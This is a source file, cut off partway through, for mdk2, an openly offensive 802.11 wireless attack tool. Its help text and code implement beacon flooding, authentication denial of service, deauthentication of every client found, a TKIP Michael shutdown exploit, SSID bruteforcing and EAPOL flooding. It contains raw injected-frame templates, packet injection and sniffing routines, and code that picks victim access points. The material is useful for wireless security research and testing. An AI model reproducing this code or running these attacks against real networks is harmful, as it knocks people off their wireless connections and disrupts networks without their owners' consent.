/*
 * mdk2, a destructive 802.11 wireless network hacking tool
 *
 * This file contains parts from 'aircrack' project by Cristophe Devine.
 *
 * Copyright (C) 2004-2005 Christophe Devine
 * Copyright (C) 2006-2007 Pedro Larbig
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; version 2 of the License.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 */

#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netpacket/packet.h>
#include <linux/if_ether.h>
#include <linux/if.h>
#include <linux/wireless.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <pthread.h>

#include "pcap.h"
#include "manufactor.h"

#define uchar unsigned char

#define ARPHRD_IEEE80211        801
#define ARPHRD_IEEE80211_PRISM  802
#define ARPHRD_IEEE80211_FULL   803

#ifndef ETH_P_80211_RAW
#define ETH_P_80211_RAW 25
#endif

#define VERSION "v35"

#define MICHAEL \
    "\x08\x41\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC"  \
    "\xBB\xBB\xBB\xBB\xBB\xBB\xE0\x1B\x00\x00\x00\x20\x00\x00\x00\x00"


struct devices
{
    int fd_in,  arptype_in;
    int fd_out, arptype_out;
    int fd_rtc;

    char *iface;

    int is_wlanng;
    int is_hostap;
    int is_madwifi;
    int is_orinoco;
}
dev;

struct pckt {
	uchar *data;
	int len;
} pckt;

struct advap {
	char *ssid;
	char *mac;
} advap;

unsigned char tmpbuf[4096];                  // Temp buffer for packet manipulation in send/read_packet
uchar pkt[4096];                             // Space to save generated packet
uchar pkt_sniff[4096];                       // Space to save sniffed packets
uchar pkt_check[4096];                       // Space to save sniffed packets to check attacks
char mac_p[6] = "\x00\x00\x00\x00\x00\x00";  // Space for parsed MACs
char aps_known[100][6];                      // Array to save MACs of known APs
int aps_known_count = 0;                     // Number of known APs
char deauth_known[1000][12];                 // Array to save known deauth victims
int deauth_known_count = 0;                  // Number of known deauth victims
char auth[100][6];                           // Array to save MACs of APs currently under attack
int auths[100][4];                           // Array to save status of APs under attack
int auth_count;                              // Number of APs under attack
int showssidwarn1=1, showssidwarn2=1;        // Show warnings for overlenght SSIDs
char ssid[256];                              // Space for the SSID read from file
FILE *ssid_file_fp;                          // File containing SSIDs
char *ssid_file_name = NULL;                 // File Name for file containing SSIDs
long file_pos = 0;                           // SSID file position
uchar *mac_sa = NULL;                        // Deauth attack: Sender/Client MAC
uchar *mac_ta = NULL;                        //                Transmitter/BSSID MAC
int state = 0, wds = 0;                      // Current state of deauth algo
uchar *pkt_amok = NULL;                      // Pointer to packet for deauth mode
uchar mac_v[6] = "\x00\x00\x00\x00\x00\x00"; // Generated valid MAC
uchar *target = NULL;                        // Target for SSID Bruteforce
int exit_now = 0;                            // Tells main thread to exit
int ssid_len = 0;                            // Length of SSID used in Bruteforce mode
int ssid_eof = 0;                            // Tell other threads, SSID file has reached EOF
char brute_mode;                             // Which ASCII-characters should be used
char *brute_ssid;                            // SSID in Bruteforce mode
unsigned int end = 0;                        // Has Bruteforce mode tried all possibilities?
unsigned int turns = 0;                      // Number of tried SSIDs
unsigned int max_permutations = 1;           // Number of SSIDs possible
int real_brute = 0;                          // use Bruteforce mode?
char whitelist[1000][6];                     // Whitelist of clients not to deauth in Amok mode
int whitelist_len = 0;                       // Number of MACs in Whitelist
int wblist = 0;                              // Use white or blacklist in deauth attack


#define PKT_EAPOL_START \
	"\x08\x01\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
	"\x70\x6a\xaa\xaa\x03\x00\x00\x00\x88\x8e\x01\x01\x00\x00"

#define PKT_EAPOL_LOGOFF \
	"\x08\x01\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
	"\x70\x6a\xaa\xaa\x03\x00\x00\x00\x88\x8e\x01\x02\x00\x00"

#define EAPOL_ATTACK_START_FLOOD 0
#define EAPOL_ATTACK_LOGOFF      1
#define FLAG_AUTH_WPA     1
#define FLAG_AUTH_RSN     2
#define FLAG_TKIP         1
#define FLAG_CCMP         2
#define SUPP_RATES        "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24"  // supported rates (1;2;5,5;11;6;9;12;18)
#define EXT_RATES         "\x32\x04\x30\x48\x60\x6c"                  // extended rates (24;36;48;54)
#define IE_WPA            "\x00\x50\xf2\x01\x01\x00"
#define IE_WPA_TKIP       "\x00\x50\xf2\x02"
#define IE_WPA_CCMP       "\x00\x50\xf2\x04"
#define IE_WPA_KEY_MGMT   "\x00\x50\xf2\x01"
#define IE_RSN            "\x30\x12\x01\x00"
#define IE_RSN_TKIP       "\x00\x0f\xac\x02"
#define IE_RSN_CCMP       "\x00\x0f\xac\x04"
#define IE_RSN_KEY_MGMT   "\x00\x0f\xac\x01"

int eapol_attack;                            // the actual EAPOL attack
int eapol_state = 0;                         // state of the EAPOL FSM
uchar eapol_src[6];                          // src address used for EAPOL frames
uchar eapol_dst[6];                          // dst address used for EAPOL frames
int eapol_wtype = FLAG_AUTH_WPA;             // default auth type: WPA
int eapol_ucast = FLAG_TKIP;                 // default unicast cipher: TKIP
int eapol_mcast = FLAG_TKIP;                 // default multicast cipher: TKIP

char use_head[]="\nMDK 2.0 " VERSION " - Zuo Meng Hua, I love you! :D\n"
		"by ASPj of k2wrlz, based on C. Devines aireplay code\n"
		"And with lots of help from the great aircrack-ng community:\n"
		"Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape, telek0miker, Le_Vert\n"
		"THANK YOU!\n\n"
		"MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.\n"
		"No warranty of any kind! Having or using MDK may be illegal in several countries.\n\n"
		"This code is licenced under the GPLv2\n\n"
		"MDK USAGE:\n"
		"mdk <interface> <attack_mode> [attack_options]\n\n"
		"Try mdk2 --fullhelp for all attack options\n"
		"Try mdk2 --help <attack_mode> for info about one attack only\n\n"
		"ATTACK MODES:\n"
		"b   - Beacon Flood Mode\n"
		"      Sends beacon frames to show fake APs at clients.\n"
		"      This can sometimes crash network scanners and even drivers!\n"
		"a   - Authentication DoS mode\n"
		"      Sends authentication frames to all APs found in range.\n"
		"      Too much clients freeze or reset some APs.\n"
		"p   - Basic probing and ESSID Bruteforce mode\n"
		"      Probes AP and check for answer, useful for checking if SSID has\n"
		"      been correctly decloaked or if AP is in your adaptors sending range\n"
		"      SSID Bruteforcing is also possible with this attack mode.\n"
		"d   - Deauthentication / Disassociation Amok Mode\n"
		"      Kicks everybody found from AP\n"
		"m   - Michael shutdown exploitation (TKIP)\n"
		"      Cancels all traffic continuously\n"
		"x   - 802.1X attacks\n";


char use_beac[]="b   - Beacon Flood Mode\n"
		"      Sends beacon frames to show fake APs at clients.\n"
		"      This can sometimes crash network scanners and even drivers!\n"
		"      OPTIONS:\n"
		"      -n <ssid>\n"
		"         Use SSID <ssid> instead of randomly generated ones\n"
		"      -f <filename>\n"
		"         Read SSIDs from file\n"
		"      -v <filename>\n"
		"         Read MACs and SSIDs from file. See example file!\n"
		"      -d\n"
		"         Show station as Ad-Hoc\n"
		"      -w\n"
		"         Set WEP bit (Generates encrypted networks)\n"
		"      -g\n"
		"         Show station as 54 Mbit\n"
		"      -t\n"
		"         Show station using WPA TKIP encryption\n"
		"      -a\n"
		"         Show station using WPA AES encryption\n"
		"      -m\n"
		"         Use valid accesspoint MAC from OUI database\n"
		"      -h\n"
		"         Hop to channel where AP is spoofed\n"
		"         This makes attack more effective against some devices/drivers\n"
		"         But it reduces packet rate due to channel hopping.\n"
		"      -c <chan>\n"
		"         Fake an AP on channel <chan>. If you want your card to hop on\n"
		"         this channel, you have to set -h option, too!\n"
		"      -s <pps>\n"
		"         Set speed in packets per second (Default: 50)\n";

char use_auth[]="a   - Authentication DoS mode\n"
		"      Sends authentication frames to all APs found in range.\n"
		"      Too much clients freeze or reset almost every AP.\n"
		"      OPTIONS:\n"
		"      -a <ap_mac>\n"
		"         Only attack the specified AP\n"
		"      -m\n"
		"         Use valid client MAC from OUI database\n"
		"      -c\n"
		"         Do NOT check for attack being successful\n"
		"      -s <pps>\n"
		"         Set speed in packets per second (Default: unlimited)\n";

char use_prob[]="p   - Basic probing and ESSID Bruteforce mode\n"
		"      Probes AP and check for answer, useful for checking if SSID has\n"
		"      been correctly decloaked or if AP is in your adaptors sending range\n"
		"      Use -f and -t option to enable SSID Bruteforcing.\n"
		"      OPTIONS:\n"
		"      -e <ssid>\n"
		"         Tell mdk2 which SSID to probe for\n"
		"      -f <filename>\n"
		"         Read lines from file for bruteforcing hidden SSIDs\n"
		"      -t <bssid>\n"
		"         Set MAC adress of target AP\n"
		"      -s <pps>\n"
		"         Set speed (Default: unlimited, in Bruteforce mode: 300)\n"
		"      -b <character set>\n"
		"         Use full Bruteforce mode (recommended for short SSIDs only!)\n"
		"         Use this switch only to show its help screen.\n";

char use_deau[]="d   - Deauthentication / Disassociation Amok Mode\n"
		"      Kicks everybody found from AP\n"
		"      OPTIONS:\n"
		"      -w <filename>\n"
		"         Read file containing MACs not to attack (Whitelist mode)\n"
		"      -b <filename>\n"
		"         Read file containing MACs to attack (Blacklist Mode)\n"
		"      -s <pps>\n"
		"         Set speed in packets per second (Default: unlimited)\n";

char use_mich[]="m   - Michael shutdown exploitation (TKIP)\n"
		"      Cancels all traffic continuously\n"
		"      -t <bssid>\n"
		"         Set Mac address of target AP\n"
		"      -w <seconds>\n"
		"         Seconds between bursts (Default: 10)\n"
		"      -n <ppb>\n"
		"         Set packets per burst (Default: 70)\n"
		"      -s <pps>\n"
		"         Set speed (Default: 400)\n";

char use_eapo[]="x   - 802.1X attacks\n"
		"        0 - EAPOL Start packet flooding\n"
		"            -n <ssid>\n"
		"               Use SSID <ssid>\n"
		"            -t <bssid>\n"
		"               Set MAC address of target AP\n"
		"            -w <WPA type>\n"
		"               Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)\n"
		"            -u <unicast cipher>\n"
		"               Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)\n"
		"            -m <multicast cipher>\n"
		"               Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)\n"
		"            -s <pps>\n"
		"               Set speed (Default: 400)\n"
		"        1 - EAPOL Logoff attack\n"
		"            -t <bssid>\n"
		"               Set MAC address of target AP\n"
		"            -c <bssid>\n"
		"               Set MAC address of target STA\n"
		"            -s <pps>\n"
		"               Set speed (Default: 400)\n";


/* wlanng-aware frame sending routine */

int send_packet( void *buf, size_t count )
{
    int ret;

    if( dev.is_wlanng && count >= 24 )
    {
        /* for some reason, wlan-ng requires a special header */

        if( ( ((unsigned char *) buf)[0] & 3 ) != 3 )
        {
            memcpy( tmpbuf, buf, 24 );
            memset( tmpbuf + 24, 0, 22 );

            tmpbuf[30] = ( count - 24 ) & 0xFF;
            tmpbuf[31] = ( count - 24 ) >> 8;

            memcpy( tmpbuf + 46, buf + 24, count - 24 );

            count += 22;
        }
        else
        {
            memcpy( tmpbuf, buf, 30 );
            memset( tmpbuf + 30, 0, 16 );

            tmpbuf[30] = ( count - 30 ) & 0xFF;
            tmpbuf[31] = ( count - 30 ) >> 8;

            memcpy( tmpbuf + 46, buf + 30, count - 30 );

            count += 16;
        }

        buf = tmpbuf;
    }

    if( ( dev.is_wlanng || dev.is_hostap ) &&
        ( ((uchar *) buf)[1] & 3 ) == 2 )
    {
        unsigned char maddr[6];

        /* Prism2 firmware swaps the dmac and smac in FromDS packets */

        memcpy( maddr, buf + 4, 6 );
        memcpy( buf + 4, buf + 16, 6 );
        memcpy( buf + 16, maddr, 6 );
    }

    ret = write( dev.fd_out, buf, count );

    if( ret < 0 )
    {
        if( errno == EAGAIN || errno == EWOULDBLOCK ||
            errno == ENOBUFS )
        {
            usleep( 10000 );
            return( 0 );
        }

        perror( "write failed" );
        return( -1 );
    }

    return( 0 );
}

/* madwifi-aware frame reading routing */

int read_packet( void *buf, size_t count )
{
    int caplen, n = 0;

    if( ( caplen = read( dev.fd_in, tmpbuf, count ) ) < 0 )
    {
        if( errno == EAGAIN )
            return( 0 );

        perror( "read failed" );
        return( -1 );
    }

    if( dev.is_madwifi )
        caplen -= 4;    /* remove the FCS */

    memset( buf, 0, sizeof( buf ) );

    if( dev.arptype_in == ARPHRD_IEEE80211_PRISM )
    {
        /* skip the prism header */

        if( tmpbuf[7] == 0x40 )
            n = 64;
        else
            n = *(int *)( tmpbuf + 4 );

        if( n < 8 || n >= caplen )
            return( 0 );
    }

    if( dev.arptype_in == ARPHRD_IEEE80211_FULL )
    {
        /* skip the radiotap header */

        n = *(unsigned short *)( tmpbuf + 2 );

        if( n <= 0 || n >= caplen )
            return( 0 );
    }

    caplen -= n;

    memcpy( buf, tmpbuf + n, caplen );

    return( caplen );
}

/* interface initialization routine */

int openraw( char *iface, int fd, int *arptype )
{
    struct ifreq ifr;
    struct packet_mreq mr;
    struct sockaddr_ll sll;

    /* find the interface index */

    memset( &ifr, 0, sizeof( ifr ) );
    strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 );

    if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 )
    {
        perror( "ioctl(SIOCGIFINDEX) failed" );
        return( 1 );
    }

    /* bind the raw socket to the interface */

    memset( &sll, 0, sizeof( sll ) );
    sll.sll_family   = AF_PACKET;
    sll.sll_ifindex  = ifr.ifr_ifindex;

    if( dev.is_wlanng )
        sll.sll_protocol = htons( ETH_P_80211_RAW );
    else
        sll.sll_protocol = htons( ETH_P_ALL );

    if( bind( fd, (struct sockaddr *) &sll,
              sizeof( sll ) ) < 0 )
    {
        perror( "bind(ETH_P_ALL) failed" );
        return( 1 );
    }

    /* lookup the hardware type */

    if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 )
    {
        perror( "ioctl(SIOCGIFHWADDR) failed" );
        return( 1 );
    }

    if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
        ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM &&
        ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_FULL )
    {
        if( ifr.ifr_hwaddr.sa_family == 1 )
            fprintf( stderr, "\nARP linktype is set to 1 (Ethernet) " );
        else
            fprintf( stderr, "\nUnsupported hardware link type %4d ",
                     ifr.ifr_hwaddr.sa_family );

        fprintf( stderr, "- expected ARPHRD_IEEE80211\nor ARPHRD_IEEE8021"
                         "1_PRISM instead.  Make sure RFMON is enabled:\n"
                         "run 'ifconfig %s up; iwconfig %s mode Monitor "
                         "channel <#>'\n\n", iface, iface );
        return( 1 );
    }

    *arptype = ifr.ifr_hwaddr.sa_family;

    /* enable promiscuous mode */

    memset( &mr, 0, sizeof( mr ) );
    mr.mr_ifindex = sll.sll_ifindex;
    mr.mr_type    = PACKET_MR_PROMISC;

    if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP,
                    &mr, sizeof( mr ) ) < 0 )
    {
        perror( "setsockopt(PACKET_MR_PROMISC) failed" );
        return( 1 );
    }

    return( 0 );
}

/* Channel hopper */

void set_channel( int channel )
{
    char s[32];
    int pid, status;

    if( dev.is_wlanng )
    {
        memset( s, 0, sizeof( s ) );
        snprintf( s,  sizeof( s ) - 1, "channel=%d", channel );

        if( ( pid = fork() ) == 0 )
        {
            close( 0 ); close( 1 ); close( 2 ); chdir( "/" );
            execlp( "wlanctl-ng", "wlanctl-ng", dev.iface,
                    "lnxreq_wlansniff", s, NULL );
            exit( 1 );
        }

        waitpid( pid, &status, 0 );

    }

    if( dev.is_orinoco )
    {
        memset( s, 0, sizeof( s ) );
        snprintf( s,  sizeof( s ) - 1, "%d", channel );

        if( ( pid = fork() ) == 0 )
        {
            close( 0 ); close( 1 ); close( 2 ); chdir( "/" );
            execlp( "iwpriv", "iwpriv", dev.iface,
                    "monitor", "1", s, NULL );
            exit( 1 );
        }

        waitpid( pid, &status, 0 );
    }

    memset( s, 0, sizeof( s ) );
    snprintf( s,  sizeof( s ) - 1, "%d", channel );

    if( ( pid = fork() ) == 0 )
    {
        close( 0 ); close( 1 ); close( 2 ); chdir( "/" );
        execlp( "iwconfig", "iwconfig", dev.iface,
                "channel", s, NULL );
        exit( 1 );
    }

    waitpid( pid, &status, 0 );
}

/* Print packet dump to stdout */

void print_packet ( uchar *h80211, int caplen )
{
	int i,j;

	printf( "        Size: %d, FromDS: %d, ToDS: %d",
		caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );

	if( ( h80211[0] & 0x0C ) == 8 && ( h80211[1] & 0x40 ) != 0 )
	{
	if( ( h80211[27] & 0x20 ) == 0 )
		printf( " (WEP)" );
	else
		printf( " (WPA)" );
	}

	for( i = 0; i < caplen; i++ )
	{
	if( ( i & 15 ) == 0 )
	{
		if( i == 224 )
		{
		printf( "\n        --- CUT ---" );
		break;
		}

		printf( "\n        0x%04x:  ", i );
	}

	printf( "%02x", h80211[i] );

	if( ( i & 1 ) != 0 )
		printf( " " );

	if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
	{
		for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
		{
		printf( "  " );
		if( ( j & 1 ) != 0 )
			printf( " " );
		}

		printf( " " );

		for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
		printf( "%c", ( h80211[i - 15 + j] <  32 ||
				h80211[i - 15 + j] > 126 )
				? '.' : h80211[i - 15 + j] );
	}

	if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
	{
		printf( " " );

		for( j = 0; j < 16; j++ )
		printf( "%c", ( h80211[i - 15 + j] <  32 ||
				h80211[i - 15 + j] > 127 )
				? '.' : h80211[i - 15 + j] );
	}
	}
	printf("\n");
}

/* Helper functions */

char hex2char (char byte1, char byte2)
{
// Very simple routine to convert hexadecimal input into a byte
	char rv;

	if (byte1 == '0') { rv = 0; }
	if (byte1 == '1') { rv = 16; }
	if (byte1 == '2') { rv = 32; }
	if (byte1 == '3') { rv = 48; }
	if (byte1 == '4') { rv = 64; }
	if (byte1 == '5') { rv = 80; }
	if (byte1 == '6') { rv = 96; }
	if (byte1 == '7') { rv = 112; }
	if (byte1 == '8') { rv = 128; }
	if (byte1 == '9') { rv = 144; }
	if (byte1 == 'A' || byte1 == 'a') { rv = 160; }
	if (byte1 == 'B' || byte1 == 'b') { rv = 176; }
	if (byte1 == 'C' || byte1 == 'c') { rv = 192; }
	if (byte1 == 'D' || byte1 == 'd') { rv = 208; }
	if (byte1 == 'E' || byte1 == 'e') { rv = 224; }
	if (byte1 == 'F' || byte1 == 'f') { rv = 240; }

	if (byte2 == '0') { rv += 0; }
	if (byte2 == '1') { rv += 1; }
	if (byte2 == '2') { rv += 2; }
	if (byte2 == '3') { rv += 3; }
	if (byte2 == '4') { rv += 4; }
	if (byte2 == '5') { rv += 5; }
	if (byte2 == '6') { rv += 6; }
	if (byte2 == '7') { rv += 7; }
	if (byte2 == '8') { rv += 8; }
	if (byte2 == '9') { rv += 9; }
	if (byte2 == 'A' || byte2 == 'a') { rv += 10; }
	if (byte2 == 'B' || byte2 == 'b') { rv += 11; }
	if (byte2 == 'C' || byte2 == 'c') { rv += 12; }
	if (byte2 == 'D' || byte2 == 'd') { rv += 13; }
	if (byte2 == 'E' || byte2 == 'e') { rv += 14; }
	if (byte2 == 'F' || byte2 == 'f') { rv += 15; }

	return rv;
}

char *parse_mac(char *input)
{
// Parsing input MAC adresses like 00:00:11:22:aa:BB or 00001122aAbB

    char tmp[12] = "000000000000";
    int t;

    if (input[2] == ':') {
	memcpy(tmp   , input   , 2);
	memcpy(tmp+2 , input+3 , 2);
	memcpy(tmp+4 , input+6 , 2);
	memcpy(tmp+6 , input+9 , 2);
	memcpy(tmp+8 , input+12 , 2);
	memcpy(tmp+10, input+15 , 2);
    } else {
	memcpy(tmp, input, 12);
    }

    for (t=0; t<6; t++) mac_p[t] = hex2char(tmp[2*t], tmp[2*t+1]);

    return mac_p;
}

uchar *get_valid_mac_from_list(int type, int list_len)
{
    int t, pos;

    pos = random();
    pos = pos % list_len;

    // SAMPLE LINE
    // 000123000000/FFFFFF000000
    // 0 2 4 6 8 10 13 16 19 22

    if (type == 0) {
	for (t=0; t<6; t++) {
	    if (!memcmp(clients[pos]+(t*2+13), "FF", 2) || !memcmp(clients[pos]+(t*2+13), "ff", 2)) {
		mac_v[t] = hex2char(clients[pos][t*2], clients[pos][t*2+1]);
	    } else mac_v[t] = random();
	}
    } else {
	for (t=0; t<6; t++) {
	    if (!memcmp(accesspoints[pos]+(t*2+13), "FF", 2) || !memcmp(accesspoints[pos]+(t*2+13), "ff", 2)) {
		mac_v[t] = hex2char(accesspoints[pos][t*2], accesspoints[pos][t*2+1]);
	    } else mac_v[t] = random();
	}
    }

    return mac_v;
}

struct pckt generate_mac(int kind)
{
// Generate a random MAC adress
// kind : Which kind of MAC should be generated?
//    0 : random MAC
//    1 : valid client MAC
//    2 : valid accesspoint MAC

    struct pckt mac;
    uchar gmac[6];
    int t;

    mac.len = 6;

    for (t=0; t<6; t++) gmac[t] = random();
    mac.data = gmac;

    if (kind == 1) mac.data = get_valid_mac_from_list(0, clients_count);
    if (kind == 2) mac.data = get_valid_mac_from_list(1, accesspoints_count);

    return mac;
}

char generate_channel()
{
// Generate a random channel

    char c = 0;
    c = (random() % 14) + 1;
    return c;
}

char random_char()
{
// Generate random printable ascii char

    char rnd = 0;
    rnd = (random() % 94) + 32;

    return rnd;
}

char *generate_ssid()
{
// Generate random VALID SSID
// Need another to generate INVALID SSIDs (overlenght) for testing their impact on wireless devices

    char *ssid = (char *) malloc (33);
    int len=0;
    int t;

    len = (random() % 32) + 1;

    for (t=0; t<len; t++) ssid[t] = random_char();
    ssid[len]='\x00';

    return ssid;
}

char *read_line_from_file()
{
// Read SSID from file
// New line removed

    int max_len = 255;
    int len = 32;
    char *ssid_string = NULL;
    int size = 0;
    int bytes_read = 0;

    /* open file for input */
    if ((ssid_file_fp = fopen(ssid_file_name, "r")) == NULL) {
	printf("Cannot open file \n");
	exit(1);
    }

    fseek(ssid_file_fp, file_pos, SEEK_SET);
    bytes_read = getline(&ssid_string, &size, ssid_file_fp);

    if (bytes_read == -1) {
	rewind(ssid_file_fp);
	ssid_eof = 1;
	bytes_read = getline(&ssid_string, &size, ssid_file_fp);
    }

    len = strlen(ssid_string);

    if (len > max_len) {
	memcpy(ssid, ssid_string, max_len);
	ssid[max_len+1]= '\x00';
	len = strlen(ssid);
	if (showssidwarn2) {
	    printf("\rWARNING! Truncating overlenght SSID to 255 bytes!\n");
	    showssidwarn2 = 0;
	}
    } else {
	memcpy(ssid, ssid_string, len);
    }

    ssid[len-1]='\x00';

    file_pos = ftell(ssid_file_fp);
    fclose(ssid_file_fp);

    return (char*) &ssid;
}

int pps2usec(int pps)
{
// Very basic routine to convert desired packet rate to µs
// µs values were measured with rt2570 device
// Should use /dev/rtc like in aireplay

    int usec;
    int ppc = 1000000;

    if (pps>15) ppc=950000;
    if (pps>35) ppc=800000;
    if (pps>75) ppc=730000;
    if (pps>125)ppc=714000;

    usec = ppc / pps;

    return usec;
}

void bruteforce_ssid()
{
    int i;
    switch (brute_mode) {
	case 'n' :	// Numbers only
	if (brute_ssid[ssid_len-1] == (int) NULL) {
	    for (i=0; i<ssid_len; i++) {
		max_permutations *= 10;
		brute_ssid[i] = 48;
	    }
	    brute_ssid[0]--;
	}
	brute_ssid[0]++;
	for (i=0; i<ssid_len-1 ;i++) {
	    if (brute_ssid[i] == '9' + 1) {
		brute_ssid[i] = '0';
		brute_ssid[i+1]++;
	    }
	}
	turns++;
	if (brute_ssid[ssid_len-1] == ('9' + 1)) end = 1;
	break;

	case 'l' :	// only lowercase characters
	if (brute_ssid[ssid_len-1] == (int) NULL) {
	    for (i=0; i<ssid_len; i++) {
		max_permutations *= 26;
		brute_ssid[i] = 97;
	    }
	    brute_ssid[0]--;
	}
	brute_ssid[0]++;
	for (i=0; i<ssid_len-1 ;i++) {
	    if (brute_ssid[i] == 'z' + 1) {
		brute_ssid[i] = 'a';
		brute_ssid[i+1]++;
	    }
	}
	turns++;
	if (brute_ssid[ssid_len-1] == ('z' + 1))  end = 1;
	break;

	case 'u' :	// only uppercase characters
	if (brute_ssid[ssid_len-1] == (int) NULL) {
	    for (i=0; i<ssid_len; i++) {
		max_permutations *= 26;
		brute_ssid[i] = 65;
	    }
	brute_ssid[0]--;
	}
	brute_ssid[0]++;
	for (i=0; i<ssid_len-1; i++) {
	    if (brute_ssid[i] == 'Z' + 1) {
		brute_ssid[i] = 'A' ;
		brute_ssid[i+1]++;
	    }
	}
	turns++;
	if (brute_ssid[ssid_len-1] == ('Z' +1 )) end = 1;
	break;

	case 'c' :	// lower- and uppercase characters
	if (brute_ssid[ssid_len-1] == (int) NULL) {
	    for (i=0;i<ssid_len;i++) {
		max_permutations *= 52;
		brute_ssid[i] = 65;
	    }
	brute_ssid[0]--;
	}
	brute_ssid[0]++;
	for (i=0; i<ssid_len-1 ;i++) {
	    if (brute_ssid[i] == 'z' + 1) {
		brute_ssid[i] = 'A';
	    }
	    if (brute_ssid[i] == 'Z' + 1) {
		brute_ssid[i] = 'a';
		brute_ssid[i+1]++;
	    }
	}
	turns++;
	if (brute_ssid[ssid_len-1] == ('Z' + 1)) end = 1;
	break;

	case 'm' :	// lower- and uppercase characters plus numbers
	if (brute_ssid[ssid_len-1] == (int) NULL) {
	    for (i=0; i<ssid_len; i++) {
		max_permutations *= 62;
		brute_ssid[i]=48;
	    }
	    brute_ssid[0]--;
	}
	brute_ssid[0]++;
	for (i=0; i<ssid_len-1; i++) {
	    if (brute_ssid[i] == 'z' + 1) {
		brute_ssid[i] = 'A';
	    }
	    if (brute_ssid[i] == 'Z' + 1) {
		brute_ssid[i] = '0';
	    }
	    if (brute_ssid[i] == '9' + 1) {
		brute_ssid[i] = 'a';
		brute_ssid[i+1]++;
	    }
	}
	turns++;
	if (brute_ssid[ssid_len-1] == ('9' + 1))  end = 1;
	break;

	case 'a' :	// all printable characters
	if (brute_ssid[ssid_len-1] == (int) NULL) {
	    for (i=0; i<ssid_len; i++) {
		max_permutations *= 95;
		brute_ssid[i] = 32;
	    }
	    brute_ssid[0]--;
	}
	brute_ssid[0]++;
	for (i=0; i<ssid_len-1; i++) {
	    if (brute_ssid[i] == '~' + 1) {
		brute_ssid[i] = ' ';
		brute_ssid[i+1]++;
	    }
	}
	turns++;
	if (brute_ssid[ssid_len-1] == ('~' + 1))  end = 1;
	break;
	default : printf("\nYou have to specify a set of characters (a,l,u,n,c,m)!\n");
	exit(0);
	break;
    }

}

void load_whitelist(char *filename)
{

    ssid_file_name = filename;
    char *parsed_mac;

    while (! ssid_eof) {
	parsed_mac = parse_mac(read_line_from_file());
	memcpy(whitelist[whitelist_len], parsed_mac, 6);
	whitelist_len++;
    }

}

int is_whitelisted(uchar *mac)
{
    int t;

    for (t=0; t<whitelist_len; t++) {
	if (! memcmp(whitelist[t], mac, 6)) {
	    if (wblist == 1) return 1;         // When Blacklist mode is used, MACs NOT in list will be return as whitelisted
	    else return 0;
	}
    }

    if (wblist == 1) return 0;
    else return 1;
}

struct advap get_fakeap_from_file()
{

    struct advap fakeap;
    char *line;
    int t, me;
    char *mac;
    char *ssid;

skipl:

    line = read_line_from_file();

    for (t=0; t<256; t++) {  //Lets see if we have a dirty bitch...
	if ((line[t] == ' ' && t<11) ||  (line[t] == '\0' && t<12) || (line[t] == '\n' && t<12)) {
	    printf("Malformed SSID file! Skipping line: %s\n", line);
	    goto skipl;
	}
	if (line[t] == ' ') break;  // Position of first space stored in t
    }

    mac = parse_mac(line);
    ssid = line+t+1;

    fakeap.ssid = ssid;
    fakeap.mac = mac;

    return fakeap;
}

/* Sniffing Functions */

uchar *get_victim_ap()
{
// Sniffing for beacon frames to find victim APs
// Tries to to find NEW AP when called, saves already reported APs in aps_known[] array
// If it cannot find a new AP within 100 frames it either choses a random known AP
// or if no APs were ever found it keeps sniffing.

    int len = 0;
    int t, u, known;
    uchar rnd;

    keep_waiting: // When nothing ever found this is called after the sniffing loop

    for (t=0; t<100; t++)
    {
	len = 0;
	while (len < 22) len = read_packet(pkt_sniff, 4096);
	known = 0;   // Clear known flag
	if (! memcmp(pkt_sniff, "\x80", 1)) {   //Filter: let only Beacon frames through
	    for (u=0; u<aps_known_count; u++)
	    {
		if (! memcmp(aps_known[u], pkt_sniff+16, 6)) { known = 1; break; }   // AP known => Set known flag
	    }
	    if (! known)  // AP is NEW, copy MAC to array and return it
	    {
		memcpy(aps_known[aps_known_count], pkt_sniff+16, 6);
		aps_known_count++;
		return pkt_sniff+16;
	    }
	}
    }

    // No new victim found within 100 packets
    // If there are no beacons at all, wait for some to appear
    if (aps_known_count == 0) goto keep_waiting;

    // Pick random known AP to attack once more
    rnd = random() % aps_known_count;

    return (uchar *) aps_known[rnd];
}

uchar *get_victim_deauth()
{
// Sniffing for data frames to find victims

    int len = 0;

    pktsux:
    len = 0;
    while (len < 22) len = read_packet(pkt_sniff, 4096);
    if (! memcmp(pkt_sniff, "\x08", 1))
        return pkt_sniff;
    goto pktsux;
}

struct pckt get_victim_ssid()
{
    struct pckt ssid;
    uchar *zero_ssid;
    int len=0;

//Sniff packet
